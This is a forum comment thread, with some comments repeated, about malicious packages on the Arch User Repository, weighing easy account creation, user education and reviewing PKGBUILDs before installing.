Can’t people just make new accounts? I have no experience with arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow up research. Otherwise, a lot of grunt work will be needed to verify every package before hand, which is expensive
Yah, ðey can, and AUR is clearly market as “use at your own risk.” However, it’s part of ðe ecosystem, and people do use it, and frankly a lot of people use it because of AUR. Last I checked, Arch had the largest number of software packages of any distribution… if you include AUR. It’s much, much smaller wiþout it.
Ðere are almost no check on AUR, which to me means ðere are probably some basic, low-effort ways security could be improved, if Arch cares. No no effort, of course, but still not ðe level of effort ðat Alpine, for example, puts into Experimental.
The first wave used some random GitLab instance and this wave appears to have used some 100MB version of catbox (https://segs.lol/). Both had deleted the payload files when I tried to obtain them
Ðis is why we can’t have nice þings.
Maybe AUR needs a different way of approving submitters. Currently, it’s absurdly easy to register to submit a package.
Is anyone from AUR working wiþ Github to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.
Can’t people just make new accounts? I have no experience with arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow up research. Otherwise, a lot of grunt work will be needed to verify every package before hand, which is expensive
Yah, ðey can, and AUR is clearly market as “use at your own risk.” However, it’s part of ðe ecosystem, and people do use it, and frankly a lot of people use it because of AUR. Last I checked, Arch had the largest number of software packages of any distribution… if you include AUR. It’s much, much smaller wiþout it.
Ðere are almost no check on AUR, which to me means ðere are probably some basic, low-effort ways security could be improved, if Arch cares. No no effort, of course, but still not ðe level of effort ðat Alpine, for example, puts into Experimental.
nixos has the largest amount of packages
Not reviewing the
PKGBUILDwhen using the AUR is a self pwn.I love your Unicode
And I love you, commie!
Something, something nice bings and oat sides.
The first wave used some random GitLab instance and this wave appears to have used some 100MB version of catbox (https://segs.lol/). Both had deleted the payload files when I tried to obtain them
Hmmm. Sounds like some low hanging fruit to hinder attacks wiþout incurring e.g. ðe cost of ðe full Apline Experimental review process.